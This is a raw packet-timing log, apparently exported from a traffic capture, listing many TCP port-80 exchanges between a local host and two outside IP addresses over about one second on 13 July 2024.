                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926994085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.926994085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.927316904 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.927365065 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.927407980 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956440926 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956465006 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956492901 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956516981 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956530094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956530094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956530094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956553936 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956590891 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956605911 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956605911 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956629038 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956640959 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956660032 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956682920 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.956710100 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970516920 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970572948 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970622063 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970624924 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970655918 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970689058 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970698118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970699072 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970722914 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970742941 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970757961 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970804930 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970804930 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970825911 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970860004 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970876932 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970891953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970905066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970931053 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970943928 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.970985889 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973246098 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973282099 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973315954 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973345041 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973345995 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973366976 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:05.973392010 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002793074 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002872944 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002907991 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002928972 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002963066 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002964973 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002964973 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.002998114 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003001928 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003047943 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003057003 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003083944 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003106117 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003119946 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003122091 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003153086 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003177881 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003201962 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003212929 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003237009 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003257990 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003268957 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003288031 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003300905 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003325939 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003350019 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003354073 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003384113 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003416061 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003441095 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003448009 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003484964 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003488064 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003488064 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003519058 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003550053 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003571033 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003583908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003603935 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003617048 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003623009 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003650904 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003684044 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003716946 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003722906 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003722906 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003750086 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003755093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003784895 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003822088 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.003822088 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.005163908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.005198956 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.005274057 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008290052 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008342028 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008363962 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008374929 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008428097 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008454084 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008454084 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008460999 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008517027 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008517027 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008531094 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008567095 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008599997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008606911 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008622885 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008655071 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008656025 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008690119 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008714914 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008723021 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008734941 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008754969 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008789062 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008795023 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008806944 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008840084 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008877993 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008877993 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008889914 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008924007 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008936882 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008956909 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008976936 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.008991957 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009042978 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009044886 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009077072 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009119987 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009128094 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009157896 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009169102 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009210110 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009229898 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009243011 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009260893 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009277105 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009310961 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009332895 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009342909 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009358883 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009377003 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009404898 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009413004 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009418964 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009444952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009475946 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009478092 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009510994 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009527922 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009543896 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009565115 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009577990 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009582996 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009582996 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009612083 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009639025 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009645939 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009679079 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009707928 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009707928 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009715080 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009752989 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009752989 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009767056 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009798050 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009830952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009838104 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009838104 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009864092 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009896994 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009896994 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009896994 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009931087 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009932995 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009963989 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.009996891 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010008097 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010008097 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010030985 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010062933 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010070086 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010070086 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010097027 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010130882 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010134935 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010134935 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010164022 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010196924 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010205984 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010205984 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010231018 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010263920 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010296106 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010303020 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010303020 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010330915 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010364056 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010370016 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010401964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010409117 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010425091 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010435104 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010445118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010482073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010485888 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010519981 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010534048 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010552883 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010575056 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010586977 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010620117 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010653019 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010668039 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010687113 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010688066 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010709047 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010721922 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010754108 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010768890 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010787964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010793924 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010823965 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010858059 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010876894 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010890007 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010926008 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010929108 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010930061 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010958910 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010977983 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010992050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.010998011 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011022091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011042118 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011054993 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011065960 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011090040 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011106968 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011128902 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011163950 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011178017 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011178970 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011265039 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011296988 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011311054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011331081 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011332989 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011352062 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011384010 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011415958 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011435032 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011445045 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011471987 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011480093 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011502981 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011513948 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011528969 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011547089 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.011567116 CEST5898280192.168.2.577.91.77.81
